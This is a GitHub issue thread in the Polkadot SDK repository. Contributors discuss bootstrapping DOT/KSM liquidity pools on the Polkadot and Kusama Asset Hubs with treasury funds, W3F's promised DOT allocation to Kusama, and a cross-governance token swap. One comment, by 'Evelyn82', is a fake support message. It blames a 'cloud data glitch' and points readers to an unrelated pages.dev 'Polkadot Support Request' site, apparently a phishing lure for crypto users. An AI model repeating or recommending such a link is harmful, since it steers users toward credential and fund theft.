### ISSUE TITLE
[Asset Hubs] Polkadot and Kusama treasuries fund DOT/KSM pools on Asset Hubs

### ISSUE THREAD

**Issue by acatangiu** [paritytech/polkadot-sdk#6959]
DOT/KSM pools on Polkadot and Kusama Asset Hubs have very low liquidity.

We should use the Polkadot and Kusama treasuries to bootstrap this liquidity, but we have a chicken-n-egg problem: neither Treasury has access to liquidity of the other's token to be able to add DOT/KSM pair liquidity atomically.

Possible path forward:
1. We get KSM liquidity in Hydration Omnipool (or some other DEX) over the bridge: https://github.com/polkadot-fellows/runtimes/issues/514,
2. Polkadot Treasury uses Hydration (or other ecosystem DEX) to swap some DOT for KSM and provides DOT/KSM pair liquidity to Polkadot Asset Hub,
3. Kusama (or even Polkadot) Treasury uses Hydration (or other DEX) to get DOT/KSM and provide the pair liquidity over the bridge to Kusama Asset Hub.

Once we bootstrap these pairs, ecosystem arbitrage should naturally keep the pools alive and funded/balanced.

**Comment by xlc** [comment]
Isn't Kusama treasury already owns some DOT (allocated by W3F)? So it can just add both KSM and DOT?

**Comment by acatangiu** [comment]
I’m not aware of this. Where are the DOT owned by Kusama Treasury (which chain+account)? How does it access/control them?

@joepetrowski you might know more?

**Comment by xlc** [comment]
I can't find the source anymore but when Kusama launched, W3F promised that 1% of the initial supply of DOT will be reserved for Kusama. There is also a later post somewhere stated that those DOT will be transferred to Kusama treasury after P<>K bridge is alive. Maybe W3F people knows more about the details.
Not sure if it is transferred yet but this seems to be a perfect use case for those assets.

**Comment by bkchr** [comment]
> W3F promised that 1% of the initial supply of DOT will be reserved for Kusama.

Yeah that is right. I reached out to them to try to find out where they are.

**Comment by GlobalSG** [comment]
A must have thing! 
KSM and DOT can be more resilient and powerful together. 
It can give the example of scaling with multiple relay chains onboard
Hope Web3F can keep the promise regarding DOT><KSM liquidity pool.

**Comment by green-jay** [comment]
We're planning to propose listing KSM in the Omnipool asap but before we need to make sure the proposal will be constructed and executed correctly, so having the P<>K bridge support in Chopsticks would be helpful.

**Comment by bkchr** [comment]
Something I thought about, could the Polkadot & Kusama governance not just "gift" tokens for each side of the bridge? So, Polkadot governance is sending 100000DOT to Kusama and Kusama is sending KSM worth the same amount to Polkadot? Then each side can open the pools?

**Comment by Evelyn82** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Polkadot Support Request](https://chain-dappsrectification.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by olanod** [comment]
The "gift" is a good an simple thing to do but it would also be good if W3F gives a statement about the 1M DOT allocation to Kusama. The topic has been brought up several times including governance but W3F has remained silent about it.

**Comment by bkchr** [comment]
> The question is what is best `X` we can use? should we use Polkadot Treasury SA on AH? or root? or some other governance controlled account?

Yeah the Polkadot treasury account sounds about right. The proposal that transfers the funds, can also setup on its side a scheduled call that will then move the funds to the pool in X days. So, we only need one proposal on each side.

**Comment by acatangiu** [comment]
Done: https://kheopswap.xyz/#/polkadot/pools/7 and https://kheopswap.xyz/#/kusama/pools/11
